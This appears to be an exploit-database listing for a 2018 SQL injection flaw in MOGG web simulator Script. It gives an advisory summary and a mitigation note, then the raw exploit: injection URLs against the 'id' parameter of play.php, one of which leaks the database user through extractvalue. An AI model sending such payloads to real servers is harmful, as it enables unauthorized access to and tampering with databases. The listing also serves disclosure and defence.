header-logo
Suggest Exploit
vendor:
MOGG web simulator Script
by:
Meisam Monsef
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MOGG web simulator Script
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

MOGG web simulator Script – SQL Injection

A SQL injection vulnerability exists in MOGG web simulator Script, which could allow an attacker to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'play.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, or allow an attacker to modify data in the back-end database.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries and to validate user input.
Source

Exploit-DB raw data:

# Exploit Title: MOGG web simulator Script - SQL Injection
# Date: 2018-10-29
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce -
@dorsateam
# Vendor Homepage: https://github.com/spider312/mtgas
# Version: All Version


Exploit :
http://server/play.php?id=99999'+[SQL Command]+#
http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23

Navigation

Suggest Exploit

Services By CQR